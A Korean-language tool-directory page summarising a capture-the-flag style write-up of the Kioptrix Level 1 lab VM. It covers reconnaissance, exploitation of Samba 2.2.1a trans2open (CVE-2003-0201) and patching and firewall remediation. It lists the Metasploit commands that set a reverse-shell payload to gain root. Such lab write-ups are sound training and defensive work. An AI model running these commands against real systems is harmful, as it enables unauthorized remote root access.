Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Kioptrix Level 1 기술 감사. 초점: Samba 2.2.1a 익스플로잇(CVE-2003-0201), 수동 열거, 내부 인프라 보안 강화. | Kitploit
도구/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & EducationRed TeamingLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Kioptrix Level 1 기술 감사. 초점: Samba 2.2.1a 익스플로잇(CVE-2003-0201), 수동 열거, 내부 인프라 보안 강화.

저장소 보기
8개월 전아직 검토되지 않음

Kioptrix Level 1: 종합 취약점 감사 및 익스플로잇

🏛️ 전문 목표

이 목표는 Kioptrix Level 1 환경에 대한 구조화된 침투 테스트를 수행하여 완전한 'root' 권한 탈취를 달성하고, Red 팀과 Blue 팀 운영 모두에 적합한 기술적 복구 전략을 문서화하는 것이었습니다.

🏗️ 환경 재현 (하드웨어 참고 사항)

최신 가상화 기본 설정은 종종 레거시 2010 커널에서 실패합니다. 이 머신을 성공적으로 부팅하고 네트워킹하려면 다음과 같은 특정 아키텍처 구성이 필요했습니다:

  • OS 하위 유형: Linux / Red Hat (32-bit).
  • 스토리지 아키텍처: 레거시 .vmdk 하드 드라이브를 지원하기 위해 SATA에서 IDE Controller로 전환.
  • 네트워크 프로토콜: Kali Linux 공격 머신과의 내부 통신을 허용하도록 Host-only 어댑터와 함께 PCI FAST-III로 구성.

⚔️ 공격 분석 (Red Team 경로)

익스플로잇은 수동 열거(enumeration)부터 익스플로잇까지의 수명 주기를 따랐습니다:

1. 탐색 및 정찰

  • Netdiscover: 대상 IP를 식별하기 위해 netdiscover -r 192.168.184.4 사용.
  • Nmap 스캔: SSH (22), HTTP (80), RPC (111), NetBIOS-SSN (139)을 포함한 서비스 식별. Samba 2.2.1a가 주요 진입점으로 플래그 지정됨.

2. 익스플로잇 (Samba trans2open)

  • 취약점: CVE-2003-0201 (힙 오버플로우).
  • MITRE ATT&CK 매핑: - 전술: 권한 상승 (TA0004)
    • 기법: 권한 상승을 위한 익스플로잇 (T1068)
  • Metasploit 프로토콜:
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • 결과: 리버스 셸을 성공적으로 생성. whoami 명령이 root를 반환.

🛡️ 방어적 복구 (Blue Team 경로)

엔터프라이즈 환경을 보호하려면 다음 취약점 관리 (VM) 전략이 필수입니다:

  • 패치 프로토콜: 최신 지원 버전(Samba 4.x)으로 Samba 업데이트. call_trans2open 함수의 취약점은 모든 최신 버전에서 효과적으로 패치되었습니다.
  • 네트워크 강화: 포트 139 및 445를 신뢰할 수 있는 내부 서브넷으로만 제한하도록 호스트 기반 방화벽을 배포.
  • VM 역할 전략: 이 복구 조치는 표준 업무 시간 취약점 관리 주기에 해당하며, 인프라 안정성을 보장합니다.

📝 기술 증거 및 수동 로그

다음 이미지는 실제 수동 열거 및 터미널 실행을 기록한 것입니다:

대상 탐색 및 아키텍처 메모

수동 메모 1

Metasploit 명령 로직 및 페이로드 구성

수동 메모 2

Root 액세스 증명 (터미널 스냅샷)

Root 셸 증거

도구 다운로드